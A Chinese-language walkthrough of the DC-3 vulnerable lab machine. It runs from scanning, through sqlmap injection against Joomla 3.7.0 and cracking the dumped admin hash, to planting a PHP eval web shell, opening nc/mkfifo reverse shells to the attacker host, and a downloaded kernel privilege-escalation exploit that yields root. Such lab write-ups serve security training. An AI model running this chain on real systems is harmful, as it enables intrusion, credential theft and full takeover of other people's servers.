DC-3靶机渗透测试

发布时间:2026/7/29 8:28:50

DC-3靶机渗透测试
先对内网进行探活扫描nmap -sn 192.168.207.0/24dc-3的ip是192.168.207.131进行端口扫描nmap -sV -p- 192.168.207.131开放了http服务上浏览器访问http://192.168.207.131查看一下网站内容有一个登录框没有验证码可以尝试弱口令使用的是Joomla框架进行目录扫描dirsearch -u http://192.168.207.131扫到一个管理员登录页面我们对框架进行版本扫描joomscan是针对joomla的扫描器joomscan --url http://192.168.207.131Joomla 3.7.0searchsploit Joomla 3.7.0存在sql注入searchsploit -m 42033.txtcat 42033.txt这里让我们用sqlmap并给出相应语句sqlmap -u http://192.168.207.131/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent --dbs -p list[fullordering]查joomladb中的表sqlmap -u http://192.168.207.131/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 -p list[fullordering] -D joomladb --tables查#__users表里的字段sqlmap -u http://192.168.207.131/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 -p list[fullordering] -D joomladb -T #__users --columns这里的#__users要用双引号框起来不然会报错第一个填y第二个填y第三个随便填第四个填10获取字段username和passwordsqlmap -u http://192.168.207.131/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 -p list[fullordering] -D joomladb -T #__users -C username,password –dump得到admin和密码哈希将哈希存入txt中让john去跑一下echo $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu 666.txtjohn 666.txt得到密码snoopy,登录网页后台选择ExtensionsTemplatesTemplates选择Beez3 Details and Files选择new file点击左边的html选择php创建文件上传一句话木马?php eval($_POST[Z]);?上传保存访问上传的路径http://192.168.207.131/templates/beez3/html/使用蚁剑远程连接终端接下来反弹shell到kali里在kali里输入nc -lvvp 6666开启监听在蚁剑里输入nc 192.168.207.128 6666 -e /bin/bash页面显示-e不可用那么使用rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 21|nc 192.168.207.128 6666 /tmp/f是利用 nc FIFO 管道实现的反弹Shell写法常用于没有 nc -e 参数时rm /tmp/f删除 /tmp/f因为后面要创建一个新的 FIFO 文件把旧的数据删掉mkfifo /tmp/f创建命名管道cat /tmp/f不断读取 /tmp/f 里面的数据| /bin/sh交给 shell 执行-i交互模式让 shell 像正常终端一样工作21把错误输出也发送出去python -c import pty;pty.spawn(/bin/bash)查看系统版本cat /etc/os-release是Ubuntu 16.04searchsploit Ubuntu 16.04选择Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() b | linux/local/39772.txtsearchsploit -m linux/local/39772.txtcat 39772.txtwget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip开启http服务上传39772.zippython3 -m http.server 80到dc-3的终端上​wget http://192.168.207.128/39772.zipunzip 39772.zipcd 39772tar -xvf exploit.tarcd ebpf_mapfd_doubleput_exploit./compile.sh./doubleputwhoami成功获得root权限cd ~lscat the-flag.txt渗透测试成功

相关新闻

FactoryIO输送线汇流仿真与梯形图编程实践

FactoryIO输送线汇流仿真与梯形图编程实践

2026/7/29 8:18:50

1. 项目概述:FactoryIO输送线汇流仿真实验去年在给某自动化企业做技术培训时,我设计了一套基于FactoryIO的输送线仿真实验。这个项目最大的特点是用最基础的梯形图逻辑实现了复杂的物料汇流控制,现场调试一次通过率高达95%。不同于教科书式的…

Unity方向盘模拟开发:从输入处理到力反馈的完整实现指南

Unity方向盘模拟开发:从输入处理到力反馈的完整实现指南

2026/7/29 8:18:50

1. 项目概述:从方向盘到虚拟世界的桥梁在游戏开发,特别是赛车、驾驶模拟或工业仿真领域,方向盘交互的逼真度直接决定了用户体验的上限。一个物理方向盘,通过USB或蓝牙连接到电脑,其背后是复杂的轴、按钮和力反馈数据流…

微型核反应堆与微波能量传输的智能控制系统设计

微型核反应堆与微波能量传输的智能控制系统设计

2026/7/29 8:18:50

1. 项目背景与核心价值解析这个看似夸张的标题实际上揭示了当前能源技术领域几个关键发展方向:核能小型化、定向能量传输和可再生能源综合利用。作为一名在能源系统领域工作12年的工程师,我最初看到这个标题时也感到困惑,但深入分析后发现它触…

基于Arduino与蓝牙BLE的自行车智能转向灯DIY全攻略

基于Arduino与蓝牙BLE的自行车智能转向灯DIY全攻略

2026/7/29 9:18:52

1. 项目概述:从“线”到“无线”的骑行安全进化 几年前,我给自己的通勤自行车装了一套转向灯,用的是最基础的Arduino Nano和几颗LED,走线麻烦不说,开关还得装在车把上,每次转弯前都得低头找按钮&#xff0c…

UE5蓝图入门实战:从零构建可交互门与拾取系统

UE5蓝图入门实战:从零构建可交互门与拾取系统

2026/7/29 9:18:52

1. 项目概述:从“蓝图”开始你的UE5创作之旅 如果你刚接触虚幻引擎5,面对C代码感到无从下手,却又想快速做出一个能跑、能跳、能交互的Demo,那么“蓝图”就是你最好的朋友。蓝图是UE5内置的视觉化脚本系统,它用节点和连…

Playwright混合编排测试实战:API与UI协同提升自动化效率

Playwright混合编排测试实战:API与UI协同提升自动化效率

2026/7/29 9:18:52

1. 项目概述:为什么我们需要混合编排测试?在自动化测试领域,我们常常面临一个经典的“割裂”困境:API测试和UI测试像是两个独立的王国,各自为政。API测试跑得快,稳定性高,但无法验证用户最终看到…

DirectX 3D图形开发:矩阵变换原理、实战与避坑指南

DirectX 3D图形开发:矩阵变换原理、实战与避坑指南

2026/7/29 9:18:52

1. 项目概述:从向量到矩阵,3D世界的数学基石如果你和我一样,是从《DirectX12 3D 游戏开发实战》这本书开始系统学习现代图形API,那么在啃完第一天的向量代数后,第二天迎面而来的“矩阵代数”可能会让你感到一丝压力。别…

反弹Shell技术与防火墙绕过实战解析

反弹Shell技术与防火墙绕过实战解析

2026/7/29 9:18:52

1. 反弹Shell技术基础解析 在渗透测试和Web安全领域,反弹Shell(Reverse Shell)是一种常见的后渗透技术手段。与传统的正向连接不同,反弹Shell的特点是让目标主机主动连接攻击者控制的服务器,这种方式能够有效绕过防火墙…

百度网盘直链解析:5分钟掌握高速下载的终极技巧

百度网盘直链解析:5分钟掌握高速下载的终极技巧

2026/7/29 9:08:52

百度网盘直链解析:5分钟掌握高速下载的终极技巧 【免费下载链接】baidu-wangpan-parse 获取百度网盘分享文件的下载地址 项目地址: https://gitcode.com/gh_mirrors/ba/baidu-wangpan-parse 还在为百度网盘限速而烦恼?百度网盘直链解析工具&#…

[具身智能-649]:个人电脑搭建 RTSP 服务完整方案(Windows / Ubuntu 双平台,适配 RDK X5 rtsp2display 调试)

[具身智能-649]:个人电脑搭建 RTSP 服务完整方案(Windows / Ubuntu 双平台,适配 RDK X5 rtsp2display 调试)

2026/7/28 13:30:18

目标:电脑作为RTSP 服务端,循环推送 H264/H265 视频流; RDK X5 通过 rtsp2display 拉流预览,完全不需要在开发板编译 live555。 提供两套成熟方案: ✅ 方案 A:FFmpeg(最简单,优先推…

PDF合并与动态水印的工程化方案:2026国内免费工具实测对比

PDF合并与动态水印的工程化方案:2026国内免费工具实测对比

2026/7/28 16:04:36

一、背景与测试方案 在实际项目交付中,PDF文件合并与版权保护水印的叠加是一个高频但容易被低估的技术需求。典型的处理链路涉及:多源PDF的文件流合并、页面级水印渲染(含透明度混合与图层叠加)、输出文件体积控制。看似简单的操作…

PDF拆分压完图糊了?2026国内免费实测,档案员都在用的组合方案

PDF拆分压完图糊了?2026国内免费实测,档案员都在用的组合方案

2026/7/28 16:04:35

说实话,提到PDF拆分再压缩,我真是被折腾得够呛。 上个月公司年度合同归档,一份300多页的PDF总合同,需要按年份拆分成三个独立文件,再分别压缩到10MB以内方便邮件发送各部门确认。我心想这还不简单?先找个海…

AI会议纪要怎么做?会议录音转文字加自动整理,三个月实测流程

AI会议纪要怎么做?会议录音转文字加自动整理,三个月实测流程

2026/7/29 0:08:23

打工人总是跑不掉要写会议纪要。 我在一家互联网公司,一周至少八场会:产品评审、数据复盘、项目同步、客户沟通,每场一小时起步。 以前的标准流程是开会拼命记→会后凭记忆补→整理成文档发群,结果经常记不全、记错、记串。 大概年…

重庆化龙桥老旧小区改造,怎么搞定夜景照明“不扰居”又能省成本?

重庆化龙桥老旧小区改造,怎么搞定夜景照明“不扰居”又能省成本?

2026/7/29 0:08:23

重庆化龙桥靠着嘉陵江,老小区多,最近几年城市更新做的勤,不少住户都反映过小区夜景亮了是好事,可有的灯太晃眼,半夜拉着窗帘都透光,睡不好觉。还有物业算账,这灯开一整晚,公摊电费蹭…

目标模糊、资源泛滥、进度失控,AI学习计划制定失败的3大隐形陷阱及救急方案

目标模糊、资源泛滥、进度失控,AI学习计划制定失败的3大隐形陷阱及救急方案

2026/7/29 0:08:23

更多请点击: https://codechina.net 第一章:目标模糊、资源泛滥、进度失控,AI学习计划制定失败的3大隐形陷阱及救急方案 目标模糊:学得越勤,离真实能力越远 当学习目标停留在“学会AI”或“搞懂大模型”这类宽泛表述…